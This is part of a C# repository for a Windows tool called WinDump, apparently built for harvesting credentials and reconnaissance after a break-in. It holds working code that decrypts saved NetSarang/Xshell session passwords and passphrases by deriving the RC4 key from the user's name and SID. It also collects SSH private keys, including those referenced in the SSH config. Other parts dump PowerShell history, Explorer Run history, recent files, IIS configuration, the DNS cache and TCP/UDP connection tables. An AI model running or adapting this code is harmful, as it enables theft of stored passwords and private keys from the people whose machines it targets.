            string nsPath = Path.Combine(docPath, "NetSarang Computer");
            if (!Directory.Exists(nsPath))
            {
                return dt;
            }
            foreach (var file in Directory.GetFiles(nsPath, "*.pri", SearchOption.AllDirectories))
            {
                var name = Path.GetFileName(file);
                var content = File.ReadAllText(file);
                dt.Rows.Add(name, content);
            }
            return dt;

        }
        /// <summary>
        /// Returns the path segment that directly follows the "NetSarang Computer"
        /// folder in <paramref name="path"/>. GetSession uses it as the "Version"
        /// value for the session types whose files are not asked for a
        /// SessionInfo/Version entry (.xard and .xvnc).
        /// </summary>
        /// <param name="path">Full path of a session file.</param>
        /// <returns>The segment, or "" when the folder name or a following backslash is not found.</returns>
        internal static string GetVersionFromPath(string path)
        {
            var pos = path.IndexOf("NetSarang Computer");
            if (pos == -1)
            {
                return "";
            }
            // +1 skips the separator character that follows the folder name.
            var start = pos + 1 + "NetSarang Computer".Length;
            var end = path.IndexOf("\\", start);
            if (end == -1)
            {
                return "";
            }
            return path.Substring(start, end - start);

        }
        /// <summary>
        /// Derives the 32-byte key used for non-RDP rows: SHA-256 over the UTF-8 bytes
        /// of (user name + SID) when the first character of <paramref name="version"/>
        /// sorts below '7', otherwise over (reversed SID + user name).
        /// </summary>
        /// <remarks>
        /// Both inputs are available to any code running as the same user, so values
        /// protected with this key are obfuscated rather than secret with respect to
        /// that user's session; session files should be handled as if they held the
        /// password in clear.
        /// </remarks>
        /// <param name="version">Version string taken from the row.</param>
        /// <returns>The SHA-256 digest used as the RC4 key.</returns>
        internal static byte[] GetKey(string version)
        {
            byte[] key;
            var sid = id.User.ToString();
            var username = Environment.UserName;
            // Only the first character is compared. An empty string throws
            // IndexOutOfRangeException here, and a value starting with '1' (for
            // example "10") takes this first branch — NOTE(review): confirm that is intended.
            if (version[0] < '7')
            {
                key = Encoding.UTF8.GetBytes(username + sid);
            }
            else
            {
                var ca = sid.ToCharArray();
                Array.Reverse(ca);
                var rsid = new string(ca);
                key = Encoding.UTF8.GetBytes(rsid + username);
            }

            return new SHA256Managed().ComputeHash(key);
        }
        /// <summary>
        /// Derives the key used for rows whose Proto is "RDP": SHA-256 over the UTF-8
        /// bytes of the current user's SID string alone.
        /// </summary>
        /// <returns>The SHA-256 digest used as the RC4 key.</returns>
        internal static byte[] GetRDPKey()
        {
            var sid = id.User.ToString();
            var key = Encoding.UTF8.GetBytes(sid);
            return new SHA256Managed().ComputeHash(key);
        }
        /// <summary>
        /// Replaces the stored "Password" and "Passphrase" values of one session row
        /// with their decoded text, in place.
        /// </summary>
        /// <param name="row">A row produced by GetSession.</param>
        internal static void Decrypt(DataRow row)
        {
            var version = row["Version"].ToString();
            byte[] key;
            // The key depends on the literal protocol text of the row, which GetSession
            // takes from the session file for most session types.
            var isrdp = row["Proto"].ToString() == "RDP";
            if (isrdp)
            {
                key = GetRDPKey();
            }
            else
            {
                key = GetKey(version);
            }
            var pwd =
row["Password"] as string;
            // Values of 32 characters or fewer are left untouched. Longer values are
            // treated as Base64; Convert.FromBase64String throws FormatException on
            // anything else and nothing here catches it.
            if (pwd !=null && pwd.Length>32 ) {
                var data = RC4Decrypt(Convert.FromBase64String(pwd), key);

                // The last 32 bytes of the decoded buffer are dropped.
                // NOTE(review): presumably a digest appended by the client; it is not verified here.
                if (data.Length > 32)
                {
                    if (isrdp)
                    {
                        // RDP rows also skip the first 4 bytes. For data.Length of 33..35
                        // the computed count is negative and GetString throws.
                        row["Password"] = Encoding.UTF8.GetString(data, 4, data.Length - 32 - 4);
                    }
                    else
                    {
                        row["Password"] = Encoding.UTF8.GetString(data, 0, data.Length - 32);
                    }
                }


            }
            // Same handling for the passphrase, without the RDP-specific 4-byte skip.
            var phrase = row["Passphrase"] as string;
            if (phrase != null && phrase.Length > 32)
            {
                var data = RC4Decrypt(Convert.FromBase64String(phrase), key);
                if (data.Length > 32)
                {
                    Array.Resize(ref data, data.Length - 32);
                    row["Passphrase"] = Encoding.UTF8.GetString(data);
                }
            }

        }
        /// <summary>
        /// RC4 keystream XOR: schedules a 256-entry state from <paramref name="pwd"/>
        /// and XORs the generated keystream with <paramref name="data"/>. The same
        /// call both encrypts and decrypts.
        /// </summary>
        /// <param name="data">Input bytes; not modified.</param>
        /// <param name="pwd">Key bytes; an empty array causes a divide-by-zero in the first loop.</param>
        /// <returns>A new array of the same length as <paramref name="data"/>.</returns>
        internal static byte[] RC4Decrypt(byte[] data, byte[] pwd)
        {
            int[] array = new int[256];   // key bytes repeated to 256 entries
            int[] array2 = new int[256];  // permutation state
            byte[] array3 = new byte[data.Length];
            int i;
            for (i = 0; i < 256; i++)
            {
                array[i] = pwd[i % pwd.Length];
                array2[i] = i;
            }
            // Key scheduling: swap state entries under control of the key.
            int num = i = 0;
            for (; i < 256; i++)
            {
                num = (num + array2[i] + array[i]) % 256;
                int num2 = array2[i];
                array2[i] = array2[num];
                array2[num] = num2;
            }
            // Keystream generation, one output byte per input byte.
            int num3 = num = (i = 0);
            for (; i < data.Length; i++)
            {
                num3++;
                num3 %= 256;
                num += array2[num3];
                num %= 256;
                int num2 = array2[num3];
                array2[num3] = array2[num];
                array2[num] = num2;
                int num4 = array2[(array2[num3] + array2[num]) % 256];
                array3[i] = (byte)(data[i] ^ num4);
            }
            return array3;
        }
    }

}
--------------------------------------------------------------------------------
/Directories.cs:
--------------------------------------------------------------------------------
using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.Data;
using System.IO;
using
System.Reflection; 7 | using System.Text; 8 | using System.Text.RegularExpressions; 9 | 10 | namespace WinDump 11 | { 12 | class Directories 13 | { 14 | internal static DataTable Desktop() 15 | { 16 | return DirDump(@"%USERPROFILE%\Desktop"); 17 | } 18 | internal static DataTable Documents() 19 | { 20 | return DirDump(@"%USERPROFILE%\Documents"); 21 | } 22 | internal static DataTable SSH() 23 | { 24 | var path = Environment.ExpandEnvironmentVariables(@"%USERPROFILE%\.ssh"); 25 | var dt = DirDump(path, true); 26 | var existFile = new Dictionary(); 27 | var configContent = ""; 28 | foreach (DataRow row in dt.Rows) { 29 | var name = row["Name"].ToString(); 30 | if (name != "config") 31 | { 32 | existFile[Path.Combine(path, name)] = true; 33 | } 34 | else 35 | { 36 | configContent = row["Content"].ToString(); 37 | } 38 | } 39 | if (configContent != "") 40 | { 41 | foreach(Match m in new Regex(@"IdentityFile\s+(.*?)\n", RegexOptions.Compiled).Matches(configContent)) 42 | { 43 | var keypath = m.Groups[1].Value.Trim().Replace("~", "%USERPROFILE%").Replace("/", "\\"); 44 | keypath = Environment.ExpandEnvironmentVariables(keypath); 45 | if (existFile.ContainsKey(keypath)) { 46 | continue; 47 | } 48 | if (!File.Exists(keypath)) 49 | { 50 | continue; 51 | } 52 | var fileinfo = new FileInfo(keypath); 53 | 54 | dt.Rows.Add(fileinfo.LastWriteTime,fileinfo.Length,"",fileinfo.FullName,File.ReadAllText(keypath)); 55 | } 56 | } 57 | 58 | return dt; 59 | } 60 | internal static DataTable Recent() 61 | { 62 | return DirDump(@"%APPDATA%\Microsoft\Windows\Recent"); 63 | } 64 | internal static DataTable ExplorerHistory() 65 | { 66 | var dt = new DataTable(); 67 | dt.Columns.Add("Name"); 68 | dt.Columns.Add("Value"); 69 | 70 | using(var key = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU", false)) 71 | { 72 | foreach(var name in key.GetValueNames()) 73 | { 74 | var value = key.GetValue(name); 75 | dt.Rows.Add(name,value); 76 | } 77 | } 78 | 
using (var key = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths", false)) 79 | { 80 | foreach (var name in key.GetValueNames()) 81 | { 82 | var value = key.GetValue(name); 83 | dt.Rows.Add(name, value); 84 | } 85 | } 86 | return dt; 87 | } 88 | internal static DataTable Programs() 89 | { 90 | var dt = DirDump(@"%ProgramData%\Microsoft\Windows\Start Menu\Programs"); 91 | var dt2 = DirDump(@"%APPDATA%\Microsoft\Windows\Start Menu\Programs"); 92 | dt.Merge(dt2); 93 | return dt; 94 | } 95 | internal static DataTable DirDump(string path,bool withContent=false,string searchParrten="*",SearchOption searchOption = SearchOption.TopDirectoryOnly) 96 | { 97 | DataTable dt = new DataTable(); 98 | dt.Columns.Add("Date"); 99 | dt.Columns.Add("Size"); 100 | dt.Columns.Add("Link"); 101 | dt.Columns.Add("Name"); 102 | if (withContent) 103 | { 104 | dt.Columns.Add("Content"); 105 | } 106 | 107 | path = Environment.ExpandEnvironmentVariables(path); 108 | if (!Directory.Exists(path)) 109 | { 110 | return dt; 111 | } 112 | DirectoryInfo directoryInfo = new DirectoryInfo(path); 113 | 114 | foreach (var fileInfo in directoryInfo.GetFiles(searchParrten, searchOption)) 115 | { 116 | var target = ""; 117 | if (fileInfo.Extension == ".lnk") 118 | { 119 | try 120 | { 121 | var shortcut = new WinShortcut(fileInfo.FullName); 122 | target = shortcut.TargetPath; 123 | } 124 | catch { } 125 | } 126 | if (withContent) 127 | { 128 | var content = ""; 129 | if (withContent) 130 | { 131 | 132 | content = Files.DumpFile(fileInfo.FullName, out var _); 133 | } 134 | dt.Rows.Add(fileInfo.LastWriteTime, fileInfo.Length, target, fileInfo.Name, content); 135 | } 136 | else 137 | { 138 | dt.Rows.Add(fileInfo.LastWriteTime, fileInfo.Length, target, fileInfo.Name); 139 | } 140 | 141 | 142 | } 143 | if (!withContent) 144 | { 145 | foreach (var subDir in directoryInfo.GetDirectories()) 146 | { 147 | if (withContent) 148 | { 149 | dt.Rows.Add(subDir.LastWriteTime, 
"DIR", "", subDir.Name, ""); 150 | } 151 | else 152 | { 153 | dt.Rows.Add(subDir.LastWriteTime, "DIR", "", subDir.Name); 154 | } 155 | } 156 | } 157 | return dt; 158 | } 159 | 160 | } 161 | class WinShortcut 162 | { 163 | public class LinkFlags 164 | { 165 | public const int HasLinkTargetIdList = 0x00000001; 166 | public const int HasLinkInfo = 0x00000002; 167 | public const int HasName = 0x00000004; 168 | public const int HasRelativePath = 0x00000008; 169 | public const int HasWorkingDir = 0x00000010; 170 | public const int HasArguments = 0x00000020; 171 | public const int HasIconLocation = 0x00000040; 172 | public const int IsUnicode = 0x00000080; 173 | public const int ForceNoLinkInfo = 0x00000100; 174 | public const int HasExpIcon = 0x00004000; 175 | public const int EnableTargetMetadata = 0x00080000; 176 | } 177 | 178 | public class FileAttributes 179 | { 180 | public const int ReadOnly = 0x0001; 181 | public const int Hidden = 0x0002; 182 | public const int System = 0x0004; 183 | public const int Reserved1 = 0x0008; 184 | public const int Directory = 0x0010; 185 | public const int Archive = 0x0020; 186 | public const int Reserved2 = 0x0040; 187 | public const int Normal = 0x0080; 188 | public const int Temporary = 0x0100; 189 | public const int SparseFile = 0x0200; 190 | public const int ReparsePoint = 0x0400; 191 | public const int Compressed = 0x0800; 192 | public const int Offline = 0x1000; 193 | public const int NotContentIndexed = 0x2000; 194 | public const int Encrypted = 0x4000; 195 | } 196 | public class LinkInfoFlags 197 | { 198 | public const int VolumeIDAndLocalBasePath = 1; 199 | public const int CommonNetworkRelativeLinkAndPathSuffix = 2; 200 | } 201 | 202 | public WinShortcut(string path) 203 | { 204 | using (var istream = File.OpenRead(path)) 205 | { 206 | try 207 | { 208 | this.Parse(istream); 209 | } 210 | catch (Exception ex) 211 | { 212 | throw new Exception("Failed to parse this file as a Windows shortcut", ex); 213 | } 214 | } 215 | } 216 
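/// <summary>
        /// The real path of target this shortcut refers to.
        /// </summary>
        public string TargetPath { get; private set; }

        /// <summary>
        /// Whether the target this shortcut refers to is a directory.
        /// </summary>
        public bool IsDirectory { get; private set; }

        // Size of the fixed ShellLinkHeader; the optional structures start at this offset.
        private const int HeaderSize = 76;

        /// <summary>
        /// Parse the parts of a shortcut file this class uses: the header flags and,
        /// when present, the LinkInfo structure.
        /// </summary>
        /// <param name="istream">Seekable stream over the shortcut file.</param>
        private void Parse(Stream istream)
        {
            var linkFlags = this.ParseHeader(istream);

            // ParseHeader stops before the end of the header. Position the stream at
            // the first optional structure explicitly, so that a shortcut without a
            // LinkTargetIDList still has its LinkInfo read from the right offset.
            istream.Seek(HeaderSize, SeekOrigin.Begin);

            if ((linkFlags & LinkFlags.HasLinkTargetIdList) == LinkFlags.HasLinkTargetIdList)
            {
                this.ParseTargetIDList(istream);
            }
            if ((linkFlags & LinkFlags.HasLinkInfo) == LinkFlags.HasLinkInfo)
            {
                this.ParseLinkInfo(istream);
            }
        }

        /// <summary>
        /// Fill <paramref name="buffer"/> with exactly <paramref name="count"/> bytes.
        /// The file content is untrusted, so a short read is reported instead of
        /// letting stale buffer bytes be interpreted as header fields.
        /// </summary>
        /// <param name="stream">Stream to read from.</param>
        /// <param name="buffer">Destination buffer, at least <paramref name="count"/> bytes long.</param>
        /// <param name="count">Number of bytes required.</param>
        /// <exception cref="EndOfStreamException">The stream ends before <paramref name="count"/> bytes were read.</exception>
        private static void ReadExact(Stream stream, byte[] buffer, int count)
        {
            var done = 0;
            while (done < count)
            {
                var n = stream.Read(buffer, done, count - done);
                if (n <= 0)
                {
                    throw new EndOfStreamException("Shortcut file is truncated");
                }
                done += n;
            }
        }

        /// <summary>
        /// Parse the header.
        /// </summary>
        /// <param name="stream">Seekable stream over the shortcut file.</param>
        /// <returns>The flags that specify the presence of optional structures</returns>
        private int ParseHeader(Stream stream)
        {
            stream.Seek(20, SeekOrigin.Begin);//jump to the LinkFlags part of ShellLinkHeader
            var buffer = new byte[4];
            ReadExact(stream, buffer, buffer.Length);
            var linkFlags = BitConverter.ToInt32(buffer, 0);

            ReadExact(stream, buffer, buffer.Length);//read next 4 bytes, that is FileAttributes
            var fileAttrFlags = BitConverter.ToInt32(buffer, 0);
            IsDirectory = (fileAttrFlags & FileAttributes.Directory) == FileAttributes.Directory;

            // The remaining header fields are not used; the caller seeks past them.
            return linkFlags;
        }

        /// <summary>
        /// Parse the TargetIDList part.
        /// </summary>
        /// <param name="stream">Seekable stream over the shortcut file.</param>
        private void ParseTargetIDList(Stream stream)
        {
            stream.Seek(HeaderSize, SeekOrigin.Begin);//jump to the LinkTargetIDList part
            var buffer = new byte[2];
            ReadExact(stream, buffer, buffer.Length);
            // The size field is an unsigned 16-bit value. Reading it as signed turned
            // sizes of 0x8000 and above into a backward seek.
            var size = BitConverter.ToUInt16(buffer, 0);
            //the TargetIDList part isn't used currently, so just move the cursor forward
            stream.Seek(size, SeekOrigin.Current);
        }

        ///
        /// Parse the LinkInfo part.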
        /// Reads LocalBasePath into TargetPath when the LinkInfo flags say it is present.
        /// The stream must be positioned at the first byte of LinkInfo on entry.
        private void ParseLinkInfo(Stream stream)
        {
            var start = stream.Position;//save the start position of LinkInfo
            stream.Seek(8, SeekOrigin.Current);//jump to the LinkInfoFlags part
            var buffer = new byte[4];
            // The number of bytes actually read is not checked here.
            stream.Read(buffer, 0, buffer.Length);
            var lnkInfoFlags = BitConverter.ToInt32(buffer, 0);
            if ((lnkInfoFlags & LinkInfoFlags.VolumeIDAndLocalBasePath) == LinkInfoFlags.VolumeIDAndLocalBasePath)
            {
                // Skip the 4-byte field that precedes the LocalBasePath offset.
                stream.Seek(4, SeekOrigin.Current);
                stream.Read(buffer, 0, buffer.Length);
                // The offset comes from the file and is used without a range check;
                // a value that produces a negative position makes Seek throw.
                var localBasePathOffset = BitConverter.ToInt32(buffer, 0);
                var basePathOffset = start + localBasePathOffset;
                stream.Seek(basePathOffset, SeekOrigin.Begin);

                using (var ms = new MemoryStream())
                {
                    var b = 0;
                    //get raw bytes of LocalBasePath
                    // Stops at the first zero byte or at end of stream (ReadByte returns -1).
                    while ((b = stream.ReadByte()) > 0)
                        ms.WriteByte((byte)b);

                    // Decoded with the system default code page.
                    TargetPath = Encoding.Default.GetString(ms.ToArray());
                }
            }
        }
    }

}
--------------------------------------------------------------------------------
/Files.cs:
--------------------------------------------------------------------------------
using System;
using System.Collections.Generic;
using System.IO;
using System.Text;

namespace WinDump
{
    internal class Files
    {
        /// <summary>
        /// Reads a text file after expanding environment variables in its path.
        /// </summary>
        /// <param name="file">Path, may contain %VAR% references.</param>
        /// <param name="ok">True when the file was read; false when reading threw.</param>
        /// <returns>
        /// The file content, or the exception message on failure. Callers that
        /// discard <paramref name="ok"/> cannot tell the two apart.
        /// </returns>
        internal static string DumpFile(string file,out bool ok)
        {
            try
            {
                var data = File.ReadAllText(Environment.ExpandEnvironmentVariables(file));
                ok = true;
                return data;
            }
            catch (Exception e)
            {
                ok = false;
                return e.Message;
            }
        }
        /// <summary>Returns the content of the system hosts file (or an error message).</summary>
        internal static string Hosts()
        {
            return DumpFile(@"%windir%\system32\drivers\etc\hosts", out var _);
        }
        /// <summary>
        /// Returns the IIS configuration: ApplicationHost.config when it can be read,
        /// otherwise MetaBase.xml.
        /// </summary>
        internal static string IIS()
        {
            // >=IIS7
            var iis7 = DumpFile(@"%windir%\system32\inetsrv\config\ApplicationHost.config", out var ok);
            if (ok) return iis7;
            // IIS6
            var iis6 =
DumpFile(@"%windir%\system32\inetsrv\MetaBase.xml", out ok); 35 | if (ok) 36 | { 37 | return iis6; 38 | } 39 | else 40 | { 41 | return iis7 + "\n" + iis6; 42 | } 43 | } 44 | internal static string Powershell() { 45 | return DumpFile(@"%appdata%\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt", out var _); 46 | } 47 | } 48 | } 49 | -------------------------------------------------------------------------------- /LICENSE.txt: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) [year] [fullname] 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
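--------------------------------------------------------------------------------
/Network/DNSCache.cs:
--------------------------------------------------------------------------------
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Runtime.InteropServices;
using System.Text;

namespace WinDump
{

    class DNSCache
    {
        // Maps numeric DNS record types to display names. The generic type arguments
        // are written out (integer keys, string names) so the declaration compiles;
        // the lookup below indexes it with Convert.ToInt32(...).
        internal static Dictionary<int, string> DnsTypes = new Dictionary<int, string> {
            {0x1,"A"},
            {0x2,"NS"},
            {0x3,"MD"},
            {0x4,"MF"},
            {0x5,"CNAME"},
            {0x6,"SOA"},
            {0x7,"MB"},
            {0x8,"MG"},
            {0x9,"MR"},
            {0xA,"NULL"},
            {0xB,"WKS"},
            {0xC,"PTR"},
            {0xD,"HINFO"},
            {0xE,"MINFO"},
            {0xF,"MX"},
            {0x10,"TEXT"},
            {0x11,"RP"},
            {0x12,"AFSDB"},
            {0x13,"X25"},
            {0x14,"ISDN"},
            {0x15,"RT"},
            {0x16,"NSAP"},
            {0x17,"NSAPPTR"},
            {0x18,"SIG"},
            {0x19,"KEY"},
            {0x1A,"PX"},
            {0x1B,"GPOS"},
            {0x1C,"AAAA"},
            {0x1D,"LOC"},
            {0x1E,"NXT"},
            {0x1F,"EID"},
            {0x20,"NIMLOC"},
            {0x21,"SRV"},
            {0x22,"ATMA"},
            {0x23,"NAPTR"},
            {0x24,"KX"},
            {0x25,"CERT"},
            {0x26,"A6"},
            {0x27,"DNAME"},
            {0x28,"SINK"},
            {0x29,"OPT"},
            {0x2B,"DS"},
            {0x2E,"RRSIG"},
            {0x2F,"NSEC"},
            {0x30,"DNSKEY"},
            {0x31,"DHCID"},
            {0x64,"UINFO"},
            {0x65,"UID"},
            {0x66,"GID"},
            {0x67,"UNSPEC"},
            {0xF8,"ADDRS"},
            {0xF9,"TKEY"},
            {0xFA,"TSIG"},
            {0xFB,"IXFR"},
            // Type 252 is AXFR; the label was misspelled "AFXR".
            {0xFC,"AXFR"},
            {0xFD,"MAILB"},
            {0xFE,"MAILA"},
            {0xFF,"ALL"},
            {0xFF01,"WINS"},
            {0xFF02,"WINSR"},
        };
        /// <summary>
        /// Queries the local DNS client cache (MSFT_DNSClientCache, Status = 0) and
        /// replaces each numeric record type with its name from <see cref="DnsTypes"/>.
        /// </summary>
        /// <returns>The query result with the Type column rewritten where a name is known.</returns>
        internal static DataTable GetDNSCache()
        {
            try
            {
                var dt = Utils.Query("Select Name, Type, TimeToLive, Data From MSFT_DNSClientCache WHERE Status = 0", Utils.StandardCimv2);
                foreach (DataRow row in dt.Rows)
                {
                    try
                    {
                        // Throws for a type that is not in the table; the enclosing
                        // try then leaves the numeric value in place.
                        var typ = DnsTypes[Convert.ToInt32(row["Type"])];
                        row["Type"] =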
typ.ToString();
                    }
                    catch
                    {
                        // Unknown or unconvertible type: keep the row as returned by the query.
                    }
                }
                return dt;
            }
            catch { }
            // Any failure of the query itself ends up here; callers receive null
            // rather than an empty table and must check for it.
            return null;

        }

    }
}
--------------------------------------------------------------------------------
/Network/Interface.cs:
--------------------------------------------------------------------------------
using System;
using System.Collections.Generic;
using System.Data;
using System.Net;
using System.Text;

namespace WinDump
{
    class Interface
    {
        /// <summary>
        /// Returns the IP-enabled network adapter configurations (description, index,
        /// addresses, subnet, MAC, DHCP server, DNS servers) through Utils.Query.
        /// </summary>
        internal static DataTable GetInterface()
        {
            return Utils.Query("Select Description,InterfaceIndex,IPAddress,IPSubnet,MACAddress,DHCPServer,DNSServerSearchOrder FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled=true");
        }
        /// <summary>
        /// Returns the first IPv4 address that resolving the local host name yields.
        /// </summary>
        /// <returns>The address as text, or "" when no IPv4 address is returned.</returns>
        internal static string GetIP()
        {

            var ips = Dns.GetHostAddresses(Dns.GetHostName());
            foreach (var ip in ips) {
                if (ip.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork) {
                    return ip.ToString();
                }
            }

            return "";
        }

    }
}
--------------------------------------------------------------------------------
/Network/Netstat.cs:
--------------------------------------------------------------------------------
using System;
using System.Collections.Generic;
using System.Data;
using System.Runtime.InteropServices;
using System.Text;

namespace WinDump
{
    internal class Netstat
    {
        // P/Invoke declaration for the IP Helper call that fills a caller-supplied
        // buffer with the TCP table; dwOutBufLen carries the buffer size in and out.
        [DllImport("iphlpapi.dll", SetLastError = true)]
        static extern uint GetExtendedTcpTable(IntPtr pTcpTable, ref int dwOutBufLen, bool sort, int ipVersion, TCP_TABLE_CLASS tblClass, uint reserved = 0);


        // One row of the TCP table, laid out sequentially so it can be marshalled
        // straight from the native buffer. Ports are carried as 4-byte arrays.
        [StructLayout(LayoutKind.Sequential)]
        public struct MIB_TCPROW_OWNER_PID
        {
            // DWORD is System.UInt32 in C#
            uint state;
            System.UInt32 localAddr;
            [MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
            byte[] localPort;
            System.UInt32 remoteAddr;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)] 25 | byte[] remotePort; 26 | System.UInt32 owningPid; 27 | 28 | public uint PID 29 | { 30 | get 31 | { 32 | return owningPid; 33 | } 34 | } 35 | 36 | public string State 37 | { 38 | get 39 | { 40 | return new string[] { "", "CLOSED", "LISTEN", "SYN_SENT", "SYN_RCVD", "ESTABLISHED ", "FIN_WAIT1", "FIN_WAIT2", "CLOSE_WAIT", "CLOSING", "LAST_ACK", "TIME_WAIT", "DELETE_TCB" }[this.state]; 41 | } 42 | } 43 | public System.Net.IPAddress LocalAddress 44 | { 45 | get 46 | { 47 | return new System.Net.IPAddress(localAddr); 48 | } 49 | } 50 | 51 | public ushort LocalPort 52 | { 53 | get 54 | { 55 | return BitConverter.ToUInt16( 56 | new byte[2] { localPort[1], localPort[0] }, 0); 57 | } 58 | } 59 | 60 | public System.Net.IPAddress RemoteAddress 61 | { 62 | get 63 | { 64 | return new System.Net.IPAddress(remoteAddr); 65 | } 66 | } 67 | 68 | public ushort RemotePort 69 | { 70 | get 71 | { 72 | return BitConverter.ToUInt16( 73 | new byte[2] { remotePort[1], remotePort[0] }, 0); 74 | } 75 | } 76 | } 77 | 78 | [StructLayout(LayoutKind.Sequential)] 79 | public struct MIB_TCPTABLE_OWNER_PID 80 | { 81 | public uint dwNumEntries; 82 | MIB_TCPROW_OWNER_PID table; 83 | } 84 | 85 | enum TCP_TABLE_CLASS 86 | { 87 | TCP_TABLE_BASIC_LISTENER, 88 | TCP_TABLE_BASIC_CONNECTIONS, 89 | TCP_TABLE_BASIC_ALL, 90 | TCP_TABLE_OWNER_PID_LISTENER, 91 | TCP_TABLE_OWNER_PID_CONNECTIONS, 92 | TCP_TABLE_OWNER_PID_ALL, 93 | TCP_TABLE_OWNER_MODULE_LISTENER, 94 | TCP_TABLE_OWNER_MODULE_CONNECTIONS, 95 | TCP_TABLE_OWNER_MODULE_ALL 96 | } 97 | 98 | 99 | 100 | internal static DataTable GetTCP() 101 | { 102 | var dataTable = new DataTable(); 103 | dataTable.Columns.Add("LocalAddress"); 104 | dataTable.Columns.Add("LocalPort"); 105 | dataTable.Columns.Add("RemoteAddress"); 106 | dataTable.Columns.Add("RemotePort"); 107 | dataTable.Columns.Add("State"); 108 | dataTable.Columns.Add("PID"); 109 | // TcpRow is my own class to display returned rows in a nice manner. 
110 | // TcpRow[] tTable; 111 | int AF_INET = 2; // IP_v4 112 | int buffSize = 0; 113 | 114 | // how much memory do we need? 115 | uint ret = GetExtendedTcpTable(IntPtr.Zero, ref buffSize, true, AF_INET, TCP_TABLE_CLASS.TCP_TABLE_OWNER_PID_ALL); 116 | IntPtr buffTable = Marshal.AllocHGlobal(buffSize); 117 | 118 | try 119 | { 120 | ret = GetExtendedTcpTable(buffTable, ref buffSize, true, AF_INET, TCP_TABLE_CLASS.TCP_TABLE_OWNER_PID_ALL); 121 | if (ret != 0) 122 | { 123 | return dataTable; 124 | } 125 | 126 | // get the number of entries in the table 127 | //MibTcpTable tab = (MibTcpTable)Marshal.PtrToStructure(buffTable, typeof(MibTcpTable)); 128 | MIB_TCPTABLE_OWNER_PID tab = (MIB_TCPTABLE_OWNER_PID)Marshal.PtrToStructure(buffTable, typeof(MIB_TCPTABLE_OWNER_PID)); 129 | //IntPtr rowPtr = (IntPtr)((long)buffTable + Marshal.SizeOf(tab.numberOfEntries) ); 130 | IntPtr rowPtr = (IntPtr)((long)buffTable + Marshal.SizeOf(tab.dwNumEntries)); 131 | // buffer we will be returning 132 | //tTable = new TcpRow[tab.numberOfEntries]; 133 | 134 | //for (int i = 0; i < tab.numberOfEntries; i++) 135 | for (int i = 0; i < tab.dwNumEntries; i++) 136 | { 137 | //MibTcpRow_Owner_Pid tcpRow = (MibTcpRow_Owner_Pid)Marshal.PtrToStructure(rowPtr, typeof(MibTcpRow_Owner_Pid)); 138 | MIB_TCPROW_OWNER_PID tcpRow = (MIB_TCPROW_OWNER_PID)Marshal.PtrToStructure(rowPtr, typeof(MIB_TCPROW_OWNER_PID)); 139 | //tTable[i] = new TcpRow(tcpRow); 140 | dataTable.Rows.Add(tcpRow.LocalAddress, tcpRow.LocalPort, tcpRow.RemoteAddress, tcpRow.RemotePort, tcpRow.State, tcpRow.PID); 141 | rowPtr = (IntPtr)((long)rowPtr + Marshal.SizeOf(tcpRow)); // next entry 142 | } 143 | 144 | } 145 | finally 146 | { 147 | // Free the Memory 148 | Marshal.FreeHGlobal(buffTable); 149 | } 150 | return dataTable; 151 | } 152 | [DllImport("iphlpapi.dll", SetLastError = true)] 153 | static extern uint GetExtendedUdpTable(IntPtr pTcpTable, ref int dwOutBufLen, bool sort, int ipVersion, UDP_TABLE_CLASS tblClass, uint reserved = 
0); 154 | 155 | 156 | [StructLayout(LayoutKind.Sequential)] 157 | public struct MIB_UDPROW_OWNER_PID 158 | { 159 | // DWORD is System.UInt32 in C# 160 | System.UInt32 localAddr; 161 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)] 162 | byte[] localPort; 163 | System.UInt32 owningPid; 164 | 165 | public uint PID 166 | { 167 | get 168 | { 169 | return owningPid; 170 | } 171 | } 172 | 173 | public System.Net.IPAddress LocalAddress 174 | { 175 | get 176 | { 177 | return new System.Net.IPAddress(localAddr); 178 | } 179 | } 180 | 181 | public ushort LocalPort 182 | { 183 | get 184 | { 185 | return BitConverter.ToUInt16( 186 | new byte[2] { localPort[1], localPort[0] }, 0); 187 | } 188 | } 189 | public override string ToString() 190 | { 191 | return string.Format("UDP\t{0}:{1}\t*:*\t\t{2}", this.LocalAddress, this.LocalPort, this.PID); 192 | } 193 | } 194 | 195 | [StructLayout(LayoutKind.Sequential)] 196 | public struct MIB_UDPTABLE_OWNER_PID 197 | { 198 | public uint dwNumEntries; 199 | MIB_UDPROW_OWNER_PID table; 200 | } 201 | 202 | enum UDP_TABLE_CLASS 203 | { 204 | UDP_TABLE_BASIC, 205 | UDP_TABLE_OWNER_PID, 206 | UDP_TABLE_OWNER_MODULE 207 | } 208 | 209 | 210 | internal static DataTable GetUDP() 211 | { 212 | 213 | int AF_INET = 2; // IP_v4 214 | int buffSize = 0; 215 | var dataTable = new DataTable(); 216 | dataTable.Columns.Add("LocalAddress"); 217 | 